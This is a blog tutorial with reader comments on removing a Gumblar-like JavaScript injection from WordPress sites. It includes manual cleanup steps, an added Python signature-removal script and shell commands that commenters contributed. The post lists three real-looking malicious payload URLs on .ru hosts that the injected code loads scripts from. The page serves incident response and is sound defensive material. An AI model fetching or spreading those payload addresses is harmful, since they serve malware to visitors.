The Messenger of Allah (peace and blessings be upon him) said: "Whoever calls to goodness will receive a reward equal to the rewards of those who follow him, without diminishing their rewards in the slightest. Conversely, whoever calls to misguidance will bear sin equal to the sins of those who follow him, without diminishing their sins in the slightest." (Narrated in Sahih Muslim)
Yesterday, I found unknown code at the bottom of each WordPress file (JavaScript and homepage index files). Furthermore, the JavaScript code loads a malicious file from other remote servers, which are randomized. It works similarly to the Gumblar virus, though its code and actions are slightly different.
So far, I’ve found this malicious JavaScript code with different var values: Nhbk5v835x5dq6, H3qqea3ur6p, and Jqjzlgspz98uxl.
This code will load another malicious script from http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
This code will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/
This code will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
Some WordPress, Joomla, and Pligg users have reported this problem in several forums. I’ve successfully cleaned this virus from my iPhone blog and ryan-isra.net as well. This tutorial will guide you through disinfecting your WordPress blog from this virus.
It’s highly recommended to have Notepad++ installed on your Windows machine to make this process easier.
You can download Notepad++ from this link.
1. Log in to cPanel (if applicable).
2. Edit the content of index.php in the root directory to be any text (e.g. Under Maintenance) to protect your visitors from being infected.
3. Create a zip file of the wp-content directory, download it to your local computer and extract it.
4. Use the search feature to find all JavaScript files (*.js) in the wp-content folder.

5. Open Notepad++, then select all files in the Search Results screen and drag them into the Notepad++ window.
6. Press CTRL+H, paste the malicious JavaScript code in the “Find what” field and leave the “Replace with” field empty.

7. When finished, click File – Save All or simply press CTRL+SHIFT+S.
8. Repeat step 4, changing *.js to *index*.
9. Repeat step 8, changing *index* to *default*.
10. Remember the path of each file and then re-upload each file to its own path.
11. Get a fresh copy of WordPress, copy the wp-admin and wp-includes directories, compress them, and upload them to your hosting.
12. Replace the wp-admin and wp-includes directories in your hosting with the ones that you just uploaded.
13. Now, ensure that your computer is clean of viruses/keyloggers/trojans and then change your cPanel/FTP password.
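Steps 4 to 10 as a script, added here as an example and not part of the original post: it deletes exact copies of the injected text from files matching the three masks, returns the paths to re-upload, then rescans every file for copies the masks missed. The signature strings, sample files and function names are constructed for illustration.

```python
import fnmatch
import shutil
import tempfile
from pathlib import Path

PATTERNS = ("*.js", "*index*", "*default*")  # file masks from steps 4, 8 and 9


def scan(root, signatures, patterns=("*",)):
    """Return {relative_path: hit_count} for matching files that contain a signature."""
    found = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix == ".infected":
            continue
        if not any(fnmatch.fnmatch(path.name.lower(), p) for p in patterns):
            continue
        data = path.read_bytes()
        hits = sum(data.count(sig) for sig in signatures)
        if hits:
            found[path.relative_to(root).as_posix()] = hits
    return found


def clean(root, signatures, patterns=PATTERNS):
    """Delete every exact signature occurrence; return the files to re-upload (step 10)."""
    changed = scan(root, signatures, patterns)
    for rel in changed:
        path = Path(root) / rel
        shutil.copy2(path, f"{path}.infected")  # local evidence copy, never re-upload
        data = path.read_bytes()
        for sig in signatures:
            data = data.replace(sig, b"")
        path.write_bytes(data)
    return changed


def demo():
    # Constructed stand-ins; in real use paste the exact injected text of each variant.
    sigs = [b"/*INJECTED-VARIANT-A*/", b"/*INJECTED-VARIANT-B*/"]
    with tempfile.TemporaryDirectory() as root:
        samples = {"index.php": b"<?php ?>\n" + sigs[0],
                   "js/menu.js": b"function m(){}\n" + sigs[1] * 2,
                   "style.css": b"body{}\n" + sigs[0],  # outside the three masks
                   "default.html": b"<p>clean</p>\n"}
        for rel, body in samples.items():
            target = Path(root) / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        changed = clean(root, sigs)
        return changed, scan(root, sigs)  # second value: files still infected
```

A non-empty second result means the signature survives in files the three masks do not cover, so those files need the same treatment before anything is re-uploaded.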
The process could be simpler if you have never changed/customized any of your WordPress themes/plugins. You could simply re-upload a fresh WordPress installation, themes, and plugins.
I am so sleepy, sorry if something is wrong or missing.
- Update -
Please see these comments, some of them may help you better than my post.
Thanks guys.
Allahu A'lam. Allah is All-Knowing.
All mistakes on this blog come from human error and negligence (my own); please correct me if you find anything wrong.
Worked a treat….well done and thank you.
Are you hosted on 1and1?
You're welcome.
Nope.
However, this is a client issue.
If anyone is looking for the same code but on a unix server, this worked for me:
to list the files:
find . -exec grep "GNU GPL" '{}' \; -print
to find and replace them:
find . -type f -print0 | xargs -0 perl -pi -e 's/\/\*GNU GPL.*\{\}$/\n/g'
It will basically find anything that starts with
*GNU GPL
and finishes with
{}
Cheers
Hi Daniel, Thanks for the bash|shell command.
Unfortunately, my hosting prevents me from uploading a PHP command shell and I haven’t requested SSH access yet :(
Thanks again, Daniel ;)
Anyone care to/able to explain how this happened?
If you see my previous post, there are some links, which are helpful (for me).
I have code that removes the virus from any infected webpage: you can get it here:
http://seoforums.org/site-optimization/118-script…
BUT BE SURE TO CHANGE ALL YOUR FTP PASSWORDS IMMEDIATELY, THEY HAVE BEEN COMPROMISED.
It’s a modified version of the Gumblar removal tools, isn’t it?
Thank you so much, Martin.
It was written by a friend of mine; he is in the attribution at the top of the text. I'm not sure what he based the code on, but if it's similar it's a good guess!
perhaps you could link to that page with the fix in your main article so that others can find it?
thanks!
Martin
As the author of the script mentioned, I can say that it was written from scratch. I had to find a quick solution for fixing about a hundred infected sites. Though it has various incompatibilities with some servers and is heavy on server resources, it was well tested by me and Martin on a bunch of sites and as far as I can see it helps a lot.
So I hope it can be useful for many people.
I love the internet! Thank you for this well documented fix. Worked like a charm. Still in the dark here though as to how that got on the website. Really no clue…
Cheers.
Tnx a lot m8,
Do you have any idea how we got that virus? Maybe over FTP or the browser?
Hi predrage,
You could read previous posts, there are some useful links.
Hey, thanks for the information, it helped me a lot. May I ask how you figured out those scripts will load malicious files from other websites?
Read my previous post, when my blogs were being infected.
I used the modified Konstantin's script on a Windows hosting site, Joomla CM. Just commented out the backup part and it worked.
1000+ files were infected per site.
Tried also on localhost with an Apache server – copy the site to localhost, run the script without the .tar backup. Works fine.
Thank you guys, especially Ryan & Konstantin.
Hey Martin, I tried that curevir.php; for some reason it did not work for me. It looks like I will have to follow that Notepad++ method.